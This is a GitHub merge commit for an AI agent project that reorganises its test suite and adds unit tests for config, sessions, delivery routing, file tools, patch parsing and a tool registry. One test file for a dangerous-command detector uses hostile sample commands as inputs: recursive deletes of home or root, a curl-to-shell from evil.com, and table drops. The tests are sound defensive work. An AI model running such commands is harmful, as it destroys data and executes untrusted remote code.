Merge pull request #34 from 0xbyt4/test/reorganize-and-add-unit-tests

test: reorganize test structure and add missing unit tests
This commit is contained in:
Teknium
2026-02-25 23:49:34 -08:00
committed by GitHub
24 changed files with 1066 additions and 16 deletions

View File

@@ -66,3 +66,10 @@ py-modules = ["run_agent", "model_tools", "toolsets", "batch_runner", "trajector
[tool.setuptools.packages.find]
include = ["tools", "hermes_cli", "gateway", "cron"]
[tool.pytest.ini_options]
testpaths = ["tests"]
markers = [
"integration: marks tests requiring external services (API keys, Modal, etc.)",
]
addopts = "-m 'not integration'"

38
tests/conftest.py Normal file
View File

@@ -0,0 +1,38 @@
"""Shared fixtures for the hermes-agent test suite."""
import os
import sys
import tempfile
from pathlib import Path
from unittest.mock import patch
import pytest
# Ensure project root is importable
PROJECT_ROOT = Path(__file__).parent.parent
if str(PROJECT_ROOT) not in sys.path:
sys.path.insert(0, str(PROJECT_ROOT))
@pytest.fixture()
def tmp_dir(tmp_path):
"""Provide a temporary directory that is cleaned up automatically."""
return tmp_path
@pytest.fixture()
def mock_config():
"""Return a minimal hermes config dict suitable for unit tests."""
return {
"model": "test/mock-model",
"toolsets": ["terminal", "file"],
"max_turns": 10,
"terminal": {
"backend": "local",
"cwd": "/tmp",
"timeout": 30,
},
"compression": {"enabled": False},
"memory": {"memory_enabled": False, "user_profile_enabled": False},
"command_allowlist": [],
}

View File

View File

@@ -0,0 +1,103 @@
"""Tests for gateway configuration management."""
from gateway.config import (
GatewayConfig,
HomeChannel,
Platform,
PlatformConfig,
SessionResetPolicy,
)
class TestHomeChannelRoundtrip:
def test_to_dict_from_dict(self):
hc = HomeChannel(platform=Platform.DISCORD, chat_id="999", name="general")
d = hc.to_dict()
restored = HomeChannel.from_dict(d)
assert restored.platform == Platform.DISCORD
assert restored.chat_id == "999"
assert restored.name == "general"
class TestPlatformConfigRoundtrip:
def test_to_dict_from_dict(self):
pc = PlatformConfig(
enabled=True,
token="tok_123",
home_channel=HomeChannel(
platform=Platform.TELEGRAM,
chat_id="555",
name="Home",
),
extra={"foo": "bar"},
)
d = pc.to_dict()
restored = PlatformConfig.from_dict(d)
assert restored.enabled is True
assert restored.token == "tok_123"
assert restored.home_channel.chat_id == "555"
assert restored.extra == {"foo": "bar"}
def test_disabled_no_token(self):
pc = PlatformConfig()
d = pc.to_dict()
restored = PlatformConfig.from_dict(d)
assert restored.enabled is False
assert restored.token is None
class TestGetConnectedPlatforms:
def test_returns_enabled_with_token(self):
config = GatewayConfig(
platforms={
Platform.TELEGRAM: PlatformConfig(enabled=True, token="t"),
Platform.DISCORD: PlatformConfig(enabled=False, token="d"),
Platform.SLACK: PlatformConfig(enabled=True), # no token
},
)
connected = config.get_connected_platforms()
assert Platform.TELEGRAM in connected
assert Platform.DISCORD not in connected
assert Platform.SLACK not in connected
def test_empty_platforms(self):
config = GatewayConfig()
assert config.get_connected_platforms() == []
class TestSessionResetPolicy:
def test_roundtrip(self):
policy = SessionResetPolicy(mode="idle", at_hour=6, idle_minutes=120)
d = policy.to_dict()
restored = SessionResetPolicy.from_dict(d)
assert restored.mode == "idle"
assert restored.at_hour == 6
assert restored.idle_minutes == 120
def test_defaults(self):
policy = SessionResetPolicy()
assert policy.mode == "both"
assert policy.at_hour == 4
assert policy.idle_minutes == 1440
class TestGatewayConfigRoundtrip:
def test_full_roundtrip(self):
config = GatewayConfig(
platforms={
Platform.TELEGRAM: PlatformConfig(
enabled=True,
token="tok",
home_channel=HomeChannel(Platform.TELEGRAM, "123", "Home"),
),
},
reset_triggers=["/new"],
)
d = config.to_dict()
restored = GatewayConfig.from_dict(d)
assert Platform.TELEGRAM in restored.platforms
assert restored.platforms[Platform.TELEGRAM].token == "tok"
assert restored.reset_triggers == ["/new"]

View File

@@ -0,0 +1,86 @@
"""Tests for the delivery routing module."""
from gateway.config import Platform, GatewayConfig, PlatformConfig, HomeChannel
from gateway.delivery import DeliveryTarget, parse_deliver_spec
from gateway.session import SessionSource
class TestParseTargetPlatformChat:
def test_explicit_telegram_chat(self):
target = DeliveryTarget.parse("telegram:12345")
assert target.platform == Platform.TELEGRAM
assert target.chat_id == "12345"
assert target.is_explicit is True
def test_platform_only_no_chat_id(self):
target = DeliveryTarget.parse("discord")
assert target.platform == Platform.DISCORD
assert target.chat_id is None
assert target.is_explicit is False
def test_local_target(self):
target = DeliveryTarget.parse("local")
assert target.platform == Platform.LOCAL
assert target.chat_id is None
def test_origin_with_source(self):
origin = SessionSource(platform=Platform.TELEGRAM, chat_id="789")
target = DeliveryTarget.parse("origin", origin=origin)
assert target.platform == Platform.TELEGRAM
assert target.chat_id == "789"
assert target.is_origin is True
def test_origin_without_source(self):
target = DeliveryTarget.parse("origin")
assert target.platform == Platform.LOCAL
assert target.is_origin is True
def test_unknown_platform(self):
target = DeliveryTarget.parse("unknown_platform")
assert target.platform == Platform.LOCAL
class TestParseDeliverSpec:
def test_none_returns_default(self):
result = parse_deliver_spec(None)
assert result == "origin"
def test_empty_string_returns_default(self):
result = parse_deliver_spec("")
assert result == "origin"
def test_custom_default(self):
result = parse_deliver_spec(None, default="local")
assert result == "local"
def test_passthrough_string(self):
result = parse_deliver_spec("telegram")
assert result == "telegram"
def test_passthrough_list(self):
result = parse_deliver_spec(["local", "telegram"])
assert result == ["local", "telegram"]
class TestTargetToStringRoundtrip:
def test_origin_roundtrip(self):
origin = SessionSource(platform=Platform.TELEGRAM, chat_id="111")
target = DeliveryTarget.parse("origin", origin=origin)
assert target.to_string() == "origin"
def test_local_roundtrip(self):
target = DeliveryTarget.parse("local")
assert target.to_string() == "local"
def test_platform_only_roundtrip(self):
target = DeliveryTarget.parse("discord")
assert target.to_string() == "discord"
def test_explicit_chat_roundtrip(self):
target = DeliveryTarget.parse("telegram:999")
s = target.to_string()
assert s == "telegram:999"
reparsed = DeliveryTarget.parse(s)
assert reparsed.platform == Platform.TELEGRAM
assert reparsed.chat_id == "999"

View File

@@ -0,0 +1,88 @@
"""Tests for gateway session management."""
from gateway.config import Platform, HomeChannel, GatewayConfig, PlatformConfig
from gateway.session import (
SessionSource,
build_session_context,
build_session_context_prompt,
)
class TestSessionSourceRoundtrip:
def test_to_dict_from_dict(self):
source = SessionSource(
platform=Platform.TELEGRAM,
chat_id="12345",
chat_name="My Group",
chat_type="group",
user_id="99",
user_name="alice",
thread_id="t1",
)
d = source.to_dict()
restored = SessionSource.from_dict(d)
assert restored.platform == Platform.TELEGRAM
assert restored.chat_id == "12345"
assert restored.chat_name == "My Group"
assert restored.chat_type == "group"
assert restored.user_id == "99"
assert restored.user_name == "alice"
assert restored.thread_id == "t1"
def test_minimal_roundtrip(self):
source = SessionSource(platform=Platform.LOCAL, chat_id="cli")
d = source.to_dict()
restored = SessionSource.from_dict(d)
assert restored.platform == Platform.LOCAL
assert restored.chat_id == "cli"
class TestLocalCliSource:
def test_local_cli(self):
source = SessionSource.local_cli()
assert source.platform == Platform.LOCAL
assert source.chat_id == "cli"
assert source.chat_type == "dm"
def test_description_local(self):
source = SessionSource.local_cli()
assert source.description == "CLI terminal"
class TestBuildSessionContextPrompt:
def test_contains_platform_info(self):
config = GatewayConfig(
platforms={
Platform.TELEGRAM: PlatformConfig(
enabled=True,
token="fake-token",
home_channel=HomeChannel(
platform=Platform.TELEGRAM,
chat_id="111",
name="Home Chat",
),
),
},
)
source = SessionSource(
platform=Platform.TELEGRAM,
chat_id="111",
chat_name="Home Chat",
chat_type="dm",
)
ctx = build_session_context(source, config)
prompt = build_session_context_prompt(ctx)
assert "Telegram" in prompt
assert "Home Chat" in prompt
assert "Session Context" in prompt
def test_local_source_prompt(self):
config = GatewayConfig()
source = SessionSource.local_cli()
ctx = build_session_context(source, config)
prompt = build_session_context_prompt(ctx)
assert "Local" in prompt
assert "machine running this agent" in prompt

View File

View File

@@ -0,0 +1,68 @@
"""Tests for hermes_cli configuration management."""
import os
from pathlib import Path
from unittest.mock import patch
from hermes_cli.config import (
DEFAULT_CONFIG,
get_hermes_home,
ensure_hermes_home,
load_config,
save_config,
)
class TestGetHermesHome:
def test_default_path(self):
with patch.dict(os.environ, {}, clear=False):
os.environ.pop("HERMES_HOME", None)
home = get_hermes_home()
assert home == Path.home() / ".hermes"
def test_env_override(self):
with patch.dict(os.environ, {"HERMES_HOME": "/custom/path"}):
home = get_hermes_home()
assert home == Path("/custom/path")
class TestEnsureHermesHome:
def test_creates_subdirs(self, tmp_path):
with patch.dict(os.environ, {"HERMES_HOME": str(tmp_path)}):
ensure_hermes_home()
assert (tmp_path / "cron").is_dir()
assert (tmp_path / "sessions").is_dir()
assert (tmp_path / "logs").is_dir()
assert (tmp_path / "memories").is_dir()
class TestLoadConfigDefaults:
def test_returns_defaults_when_no_file(self, tmp_path):
with patch.dict(os.environ, {"HERMES_HOME": str(tmp_path)}):
config = load_config()
assert config["model"] == DEFAULT_CONFIG["model"]
assert config["max_turns"] == DEFAULT_CONFIG["max_turns"]
assert "terminal" in config
assert config["terminal"]["backend"] == "local"
class TestSaveAndLoadRoundtrip:
def test_roundtrip(self, tmp_path):
with patch.dict(os.environ, {"HERMES_HOME": str(tmp_path)}):
config = load_config()
config["model"] = "test/custom-model"
config["max_turns"] = 42
save_config(config)
reloaded = load_config()
assert reloaded["model"] == "test/custom-model"
assert reloaded["max_turns"] == 42
def test_nested_values_preserved(self, tmp_path):
with patch.dict(os.environ, {"HERMES_HOME": str(tmp_path)}):
config = load_config()
config["terminal"]["timeout"] = 999
save_config(config)
reloaded = load_config()
assert reloaded["terminal"]["timeout"] == 999

View File

@@ -0,0 +1,33 @@
"""Tests for the hermes_cli models module."""
from hermes_cli.models import OPENROUTER_MODELS, menu_labels, model_ids
class TestModelIds:
def test_returns_strings(self):
ids = model_ids()
assert isinstance(ids, list)
assert len(ids) > 0
assert all(isinstance(mid, str) for mid in ids)
def test_ids_match_models_list(self):
ids = model_ids()
expected = [mid for mid, _ in OPENROUTER_MODELS]
assert ids == expected
class TestMenuLabels:
def test_same_length_as_model_ids(self):
labels = menu_labels()
ids = model_ids()
assert len(labels) == len(ids)
def test_recommended_in_first(self):
labels = menu_labels()
assert "recommended" in labels[0].lower()
def test_labels_contain_model_ids(self):
labels = menu_labels()
ids = model_ids()
for label, mid in zip(labels, ids):
assert mid in label

View File

View File

@@ -6,6 +6,9 @@ This script tests the batch runner with a small sample dataset
to verify functionality before running large batches.
"""
import pytest
pytestmark = pytest.mark.integration
import json
import shutil
from pathlib import Path

View File

@@ -10,14 +10,17 @@ This script simulates batch processing with intentional failures to test:
Usage:
# Test current implementation
python tests/test_checkpoint_resumption.py --test_current
# Test after fix is applied
python tests/test_checkpoint_resumption.py --test_fixed
# Run full comparison
python tests/test_checkpoint_resumption.py --compare
"""
import pytest
pytestmark = pytest.mark.integration
import json
import os
import shutil
@@ -27,8 +30,8 @@ from pathlib import Path
from typing import List, Dict, Any
import traceback
# Add parent directory to path to import batch_runner
sys.path.insert(0, str(Path(__file__).parent.parent))
# Add project root to path to import batch_runner
sys.path.insert(0, str(Path(__file__).parent.parent.parent))
def create_test_dataset(num_prompts: int = 20) -> Path:

View File

@@ -8,11 +8,14 @@ and can execute commands in Modal sandboxes.
Usage:
# Run with Modal backend
TERMINAL_ENV=modal python tests/test_modal_terminal.py
# Or run directly (will use whatever TERMINAL_ENV is set in .env)
python tests/test_modal_terminal.py
"""
import pytest
pytestmark = pytest.mark.integration
import os
import sys
import json
@@ -24,7 +27,7 @@ try:
load_dotenv()
except ImportError:
# Manually load .env if dotenv not available
env_file = Path(__file__).parent.parent / ".env"
env_file = Path(__file__).parent.parent.parent / ".env"
if env_file.exists():
with open(env_file) as f:
for line in f:
@@ -35,8 +38,8 @@ except ImportError:
value = value.strip().strip('"').strip("'")
os.environ.setdefault(key.strip(), value)
# Add parent directory to path for imports
parent_dir = Path(__file__).parent.parent
# Add project root to path for imports
parent_dir = Path(__file__).parent.parent.parent
sys.path.insert(0, str(parent_dir))
sys.path.insert(0, str(parent_dir / "mini-swe-agent" / "src"))

View File

@@ -12,9 +12,12 @@ Usage:
Requirements:
- FIRECRAWL_API_KEY environment variable must be set
- NOUS_API_KEY environment vitinariable (optional, for LLM tests)
- NOUS_API_KEY environment variable (optional, for LLM tests)
"""
import pytest
pytestmark = pytest.mark.integration
import json
import asyncio
import sys

0
tests/tools/__init__.py Normal file
View File

View File

@@ -0,0 +1,95 @@
"""Tests for the dangerous command approval module."""
from tools.approval import (
approve_session,
clear_session,
detect_dangerous_command,
has_pending,
is_approved,
pop_pending,
submit_pending,
)
class TestDetectDangerousRm:
def test_rm_rf_detected(self):
is_dangerous, key, desc = detect_dangerous_command("rm -rf /home/user")
assert is_dangerous is True
assert desc is not None
def test_rm_recursive_long_flag(self):
is_dangerous, key, desc = detect_dangerous_command("rm --recursive /tmp/stuff")
assert is_dangerous is True
class TestDetectDangerousSudo:
def test_shell_via_c_flag(self):
is_dangerous, key, desc = detect_dangerous_command("bash -c 'echo pwned'")
assert is_dangerous is True
def test_curl_pipe_sh(self):
is_dangerous, key, desc = detect_dangerous_command("curl http://evil.com | sh")
assert is_dangerous is True
class TestDetectSqlPatterns:
def test_drop_table(self):
is_dangerous, _, desc = detect_dangerous_command("DROP TABLE users")
assert is_dangerous is True
def test_delete_without_where(self):
is_dangerous, _, desc = detect_dangerous_command("DELETE FROM users")
assert is_dangerous is True
def test_delete_with_where_safe(self):
is_dangerous, _, _ = detect_dangerous_command("DELETE FROM users WHERE id = 1")
assert is_dangerous is False
class TestSafeCommand:
def test_echo_is_safe(self):
is_dangerous, key, desc = detect_dangerous_command("echo hello world")
assert is_dangerous is False
assert key is None
def test_ls_is_safe(self):
is_dangerous, _, _ = detect_dangerous_command("ls -la /tmp")
assert is_dangerous is False
def test_git_is_safe(self):
is_dangerous, _, _ = detect_dangerous_command("git status")
assert is_dangerous is False
class TestSubmitAndPopPending:
def test_submit_and_pop(self):
key = "test_session_pending"
clear_session(key)
submit_pending(key, {"command": "rm -rf /", "pattern_key": "rm"})
assert has_pending(key) is True
approval = pop_pending(key)
assert approval["command"] == "rm -rf /"
assert has_pending(key) is False
def test_pop_empty_returns_none(self):
key = "test_session_empty"
clear_session(key)
assert pop_pending(key) is None
class TestApproveAndCheckSession:
def test_session_approval(self):
key = "test_session_approve"
clear_session(key)
assert is_approved(key, "rm") is False
approve_session(key, "rm")
assert is_approved(key, "rm") is True
def test_clear_session_removes_approvals(self):
key = "test_session_clear"
approve_session(key, "rm")
clear_session(key)
assert is_approved(key, "rm") is False

View File

@@ -12,15 +12,11 @@ Run with: python -m pytest tests/test_code_execution.py -v
"""
import json
import os
import sys
import time
import unittest
from unittest.mock import patch
# Ensure the project root is on the path
sys.path.insert(0, os.path.dirname(os.path.dirname(os.path.abspath(__file__))))
from tools.code_execution_tool import (
SANDBOX_ALLOWED_TOOLS,
execute_code,

View File

@@ -10,13 +10,10 @@ Run with: python -m pytest tests/test_delegate.py -v
"""
import json
import os
import sys
import unittest
from unittest.mock import MagicMock, patch
sys.path.insert(0, os.path.dirname(os.path.dirname(os.path.abspath(__file__))))
from tools.delegate_tool import (
DELEGATE_BLOCKED_TOOLS,
DELEGATE_TASK_SCHEMA,

View File

@@ -0,0 +1,99 @@
"""Tests for the file tools module (schema and handler wiring).
These tests verify the tool schemas and handler wiring without
requiring a running terminal environment. The actual file operations
(ShellFileOperations) depend on a terminal backend, so we mock
_get_file_ops to test the handler logic in isolation.
"""
import json
from unittest.mock import MagicMock, patch
from tools.file_tools import (
FILE_TOOLS,
READ_FILE_SCHEMA,
WRITE_FILE_SCHEMA,
PATCH_SCHEMA,
SEARCH_FILES_SCHEMA,
)
class TestSchemas:
def test_read_file_schema(self):
assert READ_FILE_SCHEMA["name"] == "read_file"
props = READ_FILE_SCHEMA["parameters"]["properties"]
assert "path" in props
assert "offset" in props
assert "limit" in props
def test_write_file_schema(self):
assert WRITE_FILE_SCHEMA["name"] == "write_file"
assert "path" in WRITE_FILE_SCHEMA["parameters"]["properties"]
assert "content" in WRITE_FILE_SCHEMA["parameters"]["properties"]
def test_patch_schema(self):
assert PATCH_SCHEMA["name"] == "patch"
props = PATCH_SCHEMA["parameters"]["properties"]
assert "mode" in props
assert "old_string" in props
assert "new_string" in props
def test_search_files_schema(self):
assert SEARCH_FILES_SCHEMA["name"] == "search_files"
props = SEARCH_FILES_SCHEMA["parameters"]["properties"]
assert "pattern" in props
assert "target" in props
class TestFileToolsList:
def test_file_tools_has_expected_entries(self):
names = {t["name"] for t in FILE_TOOLS}
assert names == {"read_file", "write_file", "patch", "search_files"}
class TestReadFileHandler:
@patch("tools.file_tools._get_file_ops")
def test_read_file_returns_json(self, mock_get):
mock_ops = MagicMock()
result_obj = MagicMock()
result_obj.to_dict.return_value = {"content": "hello", "total_lines": 1}
mock_ops.read_file.return_value = result_obj
mock_get.return_value = mock_ops
from tools.file_tools import read_file_tool
result = json.loads(read_file_tool("/tmp/test.txt"))
assert result["content"] == "hello"
mock_ops.read_file.assert_called_once_with("/tmp/test.txt", 1, 500)
class TestWriteFileHandler:
@patch("tools.file_tools._get_file_ops")
def test_write_file_returns_json(self, mock_get):
mock_ops = MagicMock()
result_obj = MagicMock()
result_obj.to_dict.return_value = {"status": "ok", "path": "/tmp/test.txt"}
mock_ops.write_file.return_value = result_obj
mock_get.return_value = mock_ops
from tools.file_tools import write_file_tool
result = json.loads(write_file_tool("/tmp/test.txt", "content"))
assert result["status"] == "ok"
mock_ops.write_file.assert_called_once_with("/tmp/test.txt", "content")
class TestPatchHandler:
@patch("tools.file_tools._get_file_ops")
def test_replace_mode_missing_path_errors(self, mock_get):
from tools.file_tools import patch_tool
result = json.loads(patch_tool(mode="replace", path=None, old_string="a", new_string="b"))
assert "error" in result
@patch("tools.file_tools._get_file_ops")
def test_unknown_mode_errors(self, mock_get):
from tools.file_tools import patch_tool
result = json.loads(patch_tool(mode="unknown"))
assert "error" in result

View File

@@ -0,0 +1,67 @@
"""Tests for the fuzzy matching module."""
from tools.fuzzy_match import fuzzy_find_and_replace
class TestExactMatch:
def test_single_replacement(self):
content = "hello world"
new, count, err = fuzzy_find_and_replace(content, "hello", "hi")
assert err is None
assert count == 1
assert new == "hi world"
def test_no_match(self):
content = "hello world"
new, count, err = fuzzy_find_and_replace(content, "xyz", "abc")
assert count == 0
assert err is not None
assert new == content
def test_empty_old_string(self):
new, count, err = fuzzy_find_and_replace("abc", "", "x")
assert count == 0
assert err is not None
def test_identical_strings(self):
new, count, err = fuzzy_find_and_replace("abc", "abc", "abc")
assert count == 0
assert "identical" in err
def test_multiline_exact(self):
content = "line1\nline2\nline3"
new, count, err = fuzzy_find_and_replace(content, "line1\nline2", "replaced")
assert err is None
assert count == 1
assert new == "replaced\nline3"
class TestWhitespaceDifference:
def test_extra_spaces_match(self):
content = "def foo( x, y ):"
new, count, err = fuzzy_find_and_replace(content, "def foo( x, y ):", "def bar(x, y):")
assert count == 1
assert "bar" in new
class TestIndentDifference:
def test_different_indentation(self):
content = " def foo():\n pass"
new, count, err = fuzzy_find_and_replace(content, "def foo():\n pass", "def bar():\n return 1")
assert count == 1
assert "bar" in new
class TestReplaceAll:
def test_multiple_matches_without_flag_errors(self):
content = "aaa bbb aaa"
new, count, err = fuzzy_find_and_replace(content, "aaa", "ccc", replace_all=False)
assert count == 0
assert "Found 2 matches" in err
def test_multiple_matches_with_flag(self):
content = "aaa bbb aaa"
new, count, err = fuzzy_find_and_replace(content, "aaa", "ccc", replace_all=True)
assert err is None
assert count == 2
assert new == "ccc bbb ccc"

View File

@@ -0,0 +1,139 @@
"""Tests for the V4A patch format parser."""
from tools.patch_parser import (
OperationType,
parse_v4a_patch,
)
class TestParseUpdateFile:
def test_basic_update(self):
patch = """\
*** Begin Patch
*** Update File: src/main.py
@@ def greet @@
def greet():
- print("hello")
+ print("hi")
*** End Patch"""
ops, err = parse_v4a_patch(patch)
assert err is None
assert len(ops) == 1
op = ops[0]
assert op.operation == OperationType.UPDATE
assert op.file_path == "src/main.py"
assert len(op.hunks) == 1
hunk = op.hunks[0]
assert hunk.context_hint == "def greet"
prefixes = [l.prefix for l in hunk.lines]
assert " " in prefixes
assert "-" in prefixes
assert "+" in prefixes
def test_multiple_hunks(self):
patch = """\
*** Begin Patch
*** Update File: f.py
@@ first @@
a
-b
+c
@@ second @@
x
-y
+z
*** End Patch"""
ops, err = parse_v4a_patch(patch)
assert err is None
assert len(ops) == 1
assert len(ops[0].hunks) == 2
assert ops[0].hunks[0].context_hint == "first"
assert ops[0].hunks[1].context_hint == "second"
class TestParseAddFile:
def test_add_file(self):
patch = """\
*** Begin Patch
*** Add File: new/module.py
+import os
+
+print("hello")
*** End Patch"""
ops, err = parse_v4a_patch(patch)
assert err is None
assert len(ops) == 1
op = ops[0]
assert op.operation == OperationType.ADD
assert op.file_path == "new/module.py"
assert len(op.hunks) == 1
contents = [l.content for l in op.hunks[0].lines if l.prefix == "+"]
assert contents[0] == "import os"
assert contents[2] == 'print("hello")'
class TestParseDeleteFile:
def test_delete_file(self):
patch = """\
*** Begin Patch
*** Delete File: old/stuff.py
*** End Patch"""
ops, err = parse_v4a_patch(patch)
assert err is None
assert len(ops) == 1
assert ops[0].operation == OperationType.DELETE
assert ops[0].file_path == "old/stuff.py"
class TestParseMoveFile:
def test_move_file(self):
patch = """\
*** Begin Patch
*** Move File: old/path.py -> new/path.py
*** End Patch"""
ops, err = parse_v4a_patch(patch)
assert err is None
assert len(ops) == 1
assert ops[0].operation == OperationType.MOVE
assert ops[0].file_path == "old/path.py"
assert ops[0].new_path == "new/path.py"
class TestParseInvalidPatch:
def test_empty_patch_returns_empty_ops(self):
ops, err = parse_v4a_patch("")
assert err is None
assert ops == []
def test_no_begin_marker_still_parses(self):
patch = """\
*** Update File: f.py
line1
-old
+new
*** End Patch"""
ops, err = parse_v4a_patch(patch)
assert err is None
assert len(ops) == 1
def test_multiple_operations(self):
patch = """\
*** Begin Patch
*** Add File: a.py
+content_a
*** Delete File: b.py
*** Update File: c.py
keep
-remove
+add
*** End Patch"""
ops, err = parse_v4a_patch(patch)
assert err is None
assert len(ops) == 3
assert ops[0].operation == OperationType.ADD
assert ops[1].operation == OperationType.DELETE
assert ops[2].operation == OperationType.UPDATE

View File

@@ -0,0 +1,121 @@
"""Tests for the central tool registry."""
import json
from tools.registry import ToolRegistry
def _dummy_handler(args, **kwargs):
return json.dumps({"ok": True})
def _make_schema(name="test_tool"):
return {"name": name, "description": f"A {name}", "parameters": {"type": "object", "properties": {}}}
class TestRegisterAndDispatch:
def test_register_and_dispatch(self):
reg = ToolRegistry()
reg.register(
name="alpha",
toolset="core",
schema=_make_schema("alpha"),
handler=_dummy_handler,
)
result = json.loads(reg.dispatch("alpha", {}))
assert result == {"ok": True}
def test_dispatch_passes_args(self):
reg = ToolRegistry()
def echo_handler(args, **kw):
return json.dumps(args)
reg.register(name="echo", toolset="core", schema=_make_schema("echo"), handler=echo_handler)
result = json.loads(reg.dispatch("echo", {"msg": "hi"}))
assert result == {"msg": "hi"}
class TestGetDefinitions:
def test_returns_openai_format(self):
reg = ToolRegistry()
reg.register(name="t1", toolset="s1", schema=_make_schema("t1"), handler=_dummy_handler)
reg.register(name="t2", toolset="s1", schema=_make_schema("t2"), handler=_dummy_handler)
defs = reg.get_definitions({"t1", "t2"})
assert len(defs) == 2
assert all(d["type"] == "function" for d in defs)
names = {d["function"]["name"] for d in defs}
assert names == {"t1", "t2"}
def test_skips_unavailable_tools(self):
reg = ToolRegistry()
reg.register(
name="available",
toolset="s",
schema=_make_schema("available"),
handler=_dummy_handler,
check_fn=lambda: True,
)
reg.register(
name="unavailable",
toolset="s",
schema=_make_schema("unavailable"),
handler=_dummy_handler,
check_fn=lambda: False,
)
defs = reg.get_definitions({"available", "unavailable"})
assert len(defs) == 1
assert defs[0]["function"]["name"] == "available"
class TestUnknownToolDispatch:
def test_returns_error_json(self):
reg = ToolRegistry()
result = json.loads(reg.dispatch("nonexistent", {}))
assert "error" in result
assert "Unknown tool" in result["error"]
class TestToolsetAvailability:
def test_no_check_fn_is_available(self):
reg = ToolRegistry()
reg.register(name="t", toolset="free", schema=_make_schema(), handler=_dummy_handler)
assert reg.is_toolset_available("free") is True
def test_check_fn_controls_availability(self):
reg = ToolRegistry()
reg.register(
name="t",
toolset="locked",
schema=_make_schema(),
handler=_dummy_handler,
check_fn=lambda: False,
)
assert reg.is_toolset_available("locked") is False
def test_check_toolset_requirements(self):
reg = ToolRegistry()
reg.register(name="a", toolset="ok", schema=_make_schema(), handler=_dummy_handler, check_fn=lambda: True)
reg.register(name="b", toolset="nope", schema=_make_schema(), handler=_dummy_handler, check_fn=lambda: False)
reqs = reg.check_toolset_requirements()
assert reqs["ok"] is True
assert reqs["nope"] is False
def test_get_all_tool_names(self):
reg = ToolRegistry()
reg.register(name="z_tool", toolset="s", schema=_make_schema(), handler=_dummy_handler)
reg.register(name="a_tool", toolset="s", schema=_make_schema(), handler=_dummy_handler)
assert reg.get_all_tool_names() == ["a_tool", "z_tool"]
def test_handler_exception_returns_error(self):
reg = ToolRegistry()
def bad_handler(args, **kw):
raise RuntimeError("boom")
reg.register(name="bad", toolset="s", schema=_make_schema(), handler=bad_handler)
result = json.loads(reg.dispatch("bad", {}))
assert "error" in result
assert "RuntimeError" in result["error"]

View File

@@ -0,0 +1,101 @@
"""Tests for the todo tool module."""
import json
from tools.todo_tool import TodoStore, todo_tool
class TestWriteAndRead:
def test_write_replaces_list(self):
store = TodoStore()
items = [
{"id": "1", "content": "First task", "status": "pending"},
{"id": "2", "content": "Second task", "status": "in_progress"},
]
result = store.write(items)
assert len(result) == 2
assert result[0]["id"] == "1"
assert result[1]["status"] == "in_progress"
def test_read_returns_copy(self):
store = TodoStore()
store.write([{"id": "1", "content": "Task", "status": "pending"}])
items = store.read()
items[0]["content"] = "MUTATED"
assert store.read()[0]["content"] == "Task"
class TestHasItems:
def test_empty_store(self):
store = TodoStore()
assert store.has_items() is False
def test_non_empty_store(self):
store = TodoStore()
store.write([{"id": "1", "content": "x", "status": "pending"}])
assert store.has_items() is True
class TestFormatForInjection:
def test_empty_returns_none(self):
store = TodoStore()
assert store.format_for_injection() is None
def test_non_empty_has_markers(self):
store = TodoStore()
store.write([
{"id": "1", "content": "Do thing", "status": "completed"},
{"id": "2", "content": "Next", "status": "pending"},
])
text = store.format_for_injection()
assert "[x]" in text
assert "[ ]" in text
assert "Do thing" in text
assert "context compression" in text.lower()
class TestMergeMode:
def test_update_existing_by_id(self):
store = TodoStore()
store.write([
{"id": "1", "content": "Original", "status": "pending"},
])
store.write(
[{"id": "1", "status": "completed"}],
merge=True,
)
items = store.read()
assert len(items) == 1
assert items[0]["status"] == "completed"
assert items[0]["content"] == "Original"
def test_merge_appends_new(self):
store = TodoStore()
store.write([{"id": "1", "content": "First", "status": "pending"}])
store.write(
[{"id": "2", "content": "Second", "status": "pending"}],
merge=True,
)
items = store.read()
assert len(items) == 2
class TestTodoToolFunction:
def test_read_mode(self):
store = TodoStore()
store.write([{"id": "1", "content": "Task", "status": "pending"}])
result = json.loads(todo_tool(store=store))
assert result["summary"]["total"] == 1
assert result["summary"]["pending"] == 1
def test_write_mode(self):
store = TodoStore()
result = json.loads(todo_tool(
todos=[{"id": "1", "content": "New", "status": "in_progress"}],
store=store,
))
assert result["summary"]["in_progress"] == 1
def test_no_store_returns_error(self):
result = json.loads(todo_tool())
assert "error" in result